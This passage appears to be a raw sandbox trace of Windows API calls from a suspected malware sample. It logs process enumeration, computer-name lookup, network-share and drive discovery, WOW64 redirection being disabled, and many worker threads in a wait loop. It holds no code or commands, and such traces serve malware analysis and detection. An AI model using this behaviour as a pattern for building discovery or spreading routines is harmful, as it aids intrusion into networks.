lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0072.209] lstrlenW (lpString="joke.exe") returned 8 [0072.209] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0072.210] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0072.210] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0072.211] lstrlenW (lpString="documents.exe") returned 13 [0072.211] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0072.211] lstrlenW (lpString="rebel.exe") returned 9 [0072.211] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0072.212] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0072.212] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0072.213] lstrlenW (lpString="conhost.exe") returned 11 [0072.213] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0072.214] lstrlenW (lpString="conhost.exe") returned 11 [0072.214] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0072.215] lstrlenW (lpString="hgaibc.exe") returned 10 [0072.215] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0072.216] lstrlenW (lpString="cmd.exe") returned 7 [0072.216] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0072.217] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0072.217] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0072.218] lstrlenW (lpString="conhost.exe") returned 11 [0072.218] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0072.218] lstrlenW (lpString="conhost.exe") returned 11 [0072.218] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.219] lstrlenW (lpString="svchost.exe") returned 11 [0072.219] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.220] lstrlenW (lpString="svchost.exe") returned 11 [0072.220] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0072.221] lstrlenW (lpString="LogonUI.exe") returned 11 [0072.221] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0072.221] lstrlenW (lpString="mode.com") returned 8 [0072.221] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0072.222] CloseHandle (hObject=0x358) returned 1 [0072.222] Sleep (dwMilliseconds=0x1f4) Thread: id = 5 os_tid = 0xd78 [0043.373] WaitForSingleObject (hHandle=0x19fddc, dwMilliseconds=0xffffffff) returned 0xffffffff [0043.373] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6153f0 | out: hHeap=0x5d0000) returned 1 Thread: id = 6 os_tid = 0xf58 [0043.373] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x65c2c8 [0043.373] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c2c8, Size=0x20) returned 0x60e930 [0043.373] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e930, Size=0x40) returned 0x5ea198 [0043.373] GetLogicalDrives () returned 0x4 [0043.373] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x64af78 [0043.439] GetComputerNameW (in: lpBuffer=0x64af7c, nSize=0x278ff64 | out: lpBuffer="NQDPDE", nSize=0x278ff64) returned 1 [0043.440] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x630898 [0043.440] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x278ff34 | out: lphEnum=0x278ff34*=0x5e5890) returned 0x0 [0043.442] WNetEnumResourceW (in: hEnum=0x5e5890, lpcCount=0x278ff30, lpBuffer=0x630898, lpBufferSize=0x278ff38 | out: lpcCount=0x278ff30, lpBuffer=0x630898, lpBufferSize=0x278ff38) returned 0x103 [0043.443] WNetCloseEnum (hEnum=0x5e5890) returned 0x0 [0043.443] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x278ff34 | out: lphEnum=0x278ff34*=0x42605c8) returned 0x0 [0046.582] WNetEnumResourceW (in: hEnum=0x42605c8, lpcCount=0x278ff30, lpBuffer=0x630898, lpBufferSize=0x278ff38 | out: lpcCount=0x278ff30, lpBuffer=0x630898, lpBufferSize=0x278ff38) returned 0x0 [0046.582] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x3cc5ea0 [0046.582] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x630898, lphEnum=0x278ff08 | out: lphEnum=0x278ff08*=0x5e57b0) returned 0x0 [0049.657] WNetEnumResourceW (in: hEnum=0x5e57b0, lpcCount=0x278ff04, lpBuffer=0x3cc5ea0, lpBufferSize=0x278ff0c | out: lpcCount=0x278ff04, lpBuffer=0x3cc5ea0, lpBufferSize=0x278ff0c) returned 0x103 [0049.657] WNetCloseEnum (hEnum=0x5e57b0) returned 0x0 [0049.657] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x3cceee8 [0049.657] WNetOpenEnumW (dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x6308b8, lphEnum=0x278ff08) Thread: id = 7 os_tid = 0xa8c [0043.432] GetTickCount () returned 0x20e7d [0043.432] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x24) returned 0x5e62b8 [0043.432] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5e62b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x280 [0043.432] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5e62b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x284 [0043.433] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5e62b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x288 [0043.433] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5e62b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x28c [0043.434] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cc38 [0043.434] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62cc38, Size=0x20) returned 0x60e930 [0043.434] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cd40 [0043.434] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62cd40, Size=0x20) returned 0x60e9d0 [0043.434] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0043.434] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0043.434] Wow64DisableWow64FsRedirection (in: OldValue=0x288ff7c | out: OldValue=0x288ff7c*=0x0) returned 1 [0043.435] lstrlenW (lpString="kernel32.dll") returned 12 [0043.435] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e930 | out: hHeap=0x5d0000) returned 1 [0043.435] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0043.435] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e9d0 | out: hHeap=0x5d0000) returned 1 [0043.435] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x617700, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x290 [0043.435] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0043.652] GetTickCount () returned 0x20f58 [0043.652] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0044.988] GetTickCount () returned 0x21497 [0044.988] GetTickCount () returned 0x21497 [0044.988] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0045.201] GetTickCount () returned 0x21562 [0045.201] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0045.587] GetTickCount () returned 0x216e9 [0045.587] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0045.706] GetTickCount () returned 0x21766 [0045.706] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0046.604] GetTickCount () returned 0x21ad1 [0046.604] GetTickCount () returned 0x21ad1 [0046.604] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0047.327] GetTickCount () returned 0x21daf [0047.327] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0047.875] GetTickCount () returned 0x21fd2 [0047.875] GetTickCount () returned 0x21fd2 [0047.876] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0048.228] GetTickCount () returned 0x2212a [0048.228] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0049.594] GetTickCount () returned 0x22699 [0049.594] GetTickCount () returned 0x22699 [0049.594] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0049.887] GetTickCount () returned 0x227b2 [0049.887] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0050.918] GetTickCount () returned 0x22bb9 [0050.918] GetTickCount () returned 0x22bb9 [0050.918] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0051.086] GetTickCount () returned 0x22c65 [0051.086] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0051.186] GetTickCount () returned 0x22cd2 [0051.187] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0051.295] GetTickCount () returned 0x22d40 [0051.295] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0051.405] GetTickCount () returned 0x22dad [0051.405] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0051.513] GetTickCount () returned 0x22e1b [0051.513] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0051.644] GetTickCount () returned 0x22e98 [0051.644] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0051.748] GetTickCount () returned 0x22f05 [0051.748] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0051.858] GetTickCount () returned 0x22f72 [0051.858] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0051.966] GetTickCount () returned 0x22fe0 [0051.966] GetTickCount () returned 0x22fe0 [0051.966] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0052.077] GetTickCount () returned 0x2304d [0052.077] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0052.185] GetTickCount () returned 0x230ba [0052.185] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0052.294] GetTickCount () returned 0x23128 [0052.294] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0052.479] GetTickCount () returned 0x231d4 [0052.479] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0052.576] GetTickCount () returned 0x23241 [0052.576] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0052.685] GetTickCount () returned 0x232ae [0052.685] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0052.810] GetTickCount () returned 0x2332b [0052.810] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0052.920] GetTickCount () returned 0x23399 [0052.920] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0053.029] GetTickCount () returned 0x23406 [0053.029] GetTickCount () returned 0x23406 [0053.029] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0053.138] GetTickCount () returned 0x23474 [0053.138] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0053.248] GetTickCount () returned 0x234e1 [0053.248] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0053.389] GetTickCount () returned 0x2356e [0053.389] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0053.497] GetTickCount () returned 0x235db [0053.497] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0053.607] GetTickCount () returned 0x23648 [0053.607] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0053.716] GetTickCount () returned 0x236b6 [0053.716] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0053.826] GetTickCount () returned 0x23723 [0053.826] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0053.966] GetTickCount () returned 0x237b0 [0053.966] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0054.076] GetTickCount () returned 0x2381d [0054.076] GetTickCount () returned 0x2381d [0054.076] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0054.185] GetTickCount () returned 0x2388a [0054.185] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0054.310] GetTickCount () returned 0x23907 [0054.310] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0054.420] GetTickCount () returned 0x23975 [0054.420] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0054.529] GetTickCount () returned 0x239e2 [0054.529] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0054.638] GetTickCount () returned 0x23a50 [0054.638] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0054.758] GetTickCount () returned 0x23abd [0054.758] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0054.857] GetTickCount () returned 0x23b2a [0054.857] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0054.972] GetTickCount () returned 0x23b98 [0054.972] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0055.661] GetTickCount () returned 0x23e47 [0055.661] GetTickCount () returned 0x23e47 [0055.661] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0056.107] GetTickCount () returned 0x2400c [0056.107] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0056.444] GetTickCount () returned 0x24154 [0056.491] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0057.200] GetTickCount () returned 0x24442 [0057.200] GetTickCount () returned 0x24442 [0057.200] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0057.974] GetTickCount () returned 0x24750 [0057.974] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0058.573] GetTickCount () returned 0x249a1 [0058.573] GetTickCount () returned 0x249a1 [0058.573] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0059.019] GetTickCount () returned 0x24b67 [0059.019] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0059.989] GetTickCount () returned 0x24f2f [0059.989] GetTickCount () returned 0x24f2f [0059.989] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0060.683] GetTickCount () returned 0x251df [0060.683] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0061.211] GetTickCount () returned 0x253f2 [0061.211] GetTickCount () returned 0x253f2 [0061.211] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0062.079] GetTickCount () returned 0x2574d [0062.079] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0062.850] GetTickCount () returned 0x25a5b [0062.850] GetTickCount () returned 0x25a5b [0062.858] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0063.414] GetTickCount () returned 0x25c8d [0063.414] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0063.884] GetTickCount () returned 0x25e62 [0063.884] GetTickCount () returned 0x25e62 [0063.884] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0064.736] GetTickCount () returned 0x261bd [0064.736] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0065.350] GetTickCount () returned 0x2641f [0065.350] GetTickCount () returned 0x2641f [0065.350] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0065.750] GetTickCount () returned 0x265b5 [0065.750] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0066.202] GetTickCount () returned 0x2677a [0066.202] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0067.253] GetTickCount () returned 0x26b91 [0067.253] GetTickCount () returned 0x26b91 [0067.253] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0067.974] GetTickCount () returned 0x26e60 [0067.974] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0069.032] GetTickCount () returned 0x27286 [0069.032] GetTickCount () returned 0x27286 [0069.032] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0069.688] GetTickCount () returned 0x27516 [0069.688] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0070.345] GetTickCount () returned 0x277a7 [0070.345] GetTickCount () returned 0x277a7 [0070.345] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0070.814] GetTickCount () returned 0x2797b [0070.814] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0070.951] GetTickCount () returned 0x27a08 [0070.951] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0071.342] GetTickCount () returned 0x27b8f [0071.342] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0071.532] GetTickCount () returned 0x27c4a [0071.532] GetTickCount () returned 0x27c4a [0071.532] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0071.674] GetTickCount () returned 0x27cd7 [0071.674] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0071.930] GetTickCount () returned 0x27dd1 [0071.930] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0072.036] GetTickCount () returned 0x27e3e [0072.036] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0072.155] GetTickCount () returned 0x27ebb [0072.155] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0072.280] GetTickCount () returned 0x27f38 [0072.280] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) returned 0x102 [0072.388] GetTickCount () returned 0x27fa6 [0072.389] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0x64) Thread: id = 8 os_tid = 0xd14 [0043.435] GetTickCount () returned 0x20e7d [0043.436] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x24) returned 0x5e60d8 [0043.436] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5e60d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x294 [0043.436] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5e60d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x298 [0043.437] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5e60d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x29c [0043.437] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5e60d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0043.438] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cbf0 [0043.438] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62cbf0, Size=0x20) returned 0x60e930 [0043.438] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cc98 [0043.438] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62cc98, Size=0x20) returned 0x60ec00 [0043.438] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0043.438] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0043.438] Wow64DisableWow64FsRedirection (in: OldValue=0x298ff7c | out: OldValue=0x298ff7c*=0x0) returned 1 [0043.438] lstrlenW (lpString="kernel32.dll") returned 12 [0043.439] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e930 | out: hHeap=0x5d0000) returned 1 [0043.439] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0043.439] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60ec00 | out: hHeap=0x5d0000) returned 1 [0043.439] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x63af58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a4 [0043.439] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0043.652] GetTickCount () returned 0x20f58 [0043.652] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0044.988] GetTickCount () returned 0x21497 [0044.988] GetTickCount () returned 0x21497 [0044.988] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0045.201] GetTickCount () returned 0x21562 [0045.201] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0045.587] GetTickCount () returned 0x216e9 [0045.587] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0045.706] GetTickCount () returned 0x21766 [0045.706] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0046.604] GetTickCount () returned 0x21ae1 [0046.604] GetTickCount () returned 0x21ae1 [0046.604] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0047.327] GetTickCount () returned 0x21daf [0047.327] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0047.876] GetTickCount () returned 0x21fd2 [0047.876] GetTickCount () returned 0x21fd2 [0047.876] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0048.229] GetTickCount () returned 0x2212a [0048.229] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0049.594] GetTickCount () returned 0x22699 [0049.594] GetTickCount () returned 0x22699 [0049.594] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0049.887] GetTickCount () returned 0x227b2 [0049.887] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0050.918] GetTickCount () returned 0x22bb9 [0050.918] GetTickCount () returned 0x22bb9 [0050.918] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0051.086] GetTickCount () returned 0x22c65 [0051.086] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0051.187] GetTickCount () returned 0x22cd2 [0051.187] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0051.295] GetTickCount () returned 0x22d40 [0051.295] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0051.405] GetTickCount () returned 0x22dad [0051.405] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0051.513] GetTickCount () returned 0x22e1b [0051.513] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0051.644] GetTickCount () returned 0x22e98 [0051.644] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0051.747] GetTickCount () returned 0x22f05 [0051.747] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0051.858] GetTickCount () returned 0x22f72 [0051.858] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0051.966] GetTickCount () returned 0x22fe0 [0051.966] GetTickCount () returned 0x22fe0 [0051.966] WaitForSingleObject 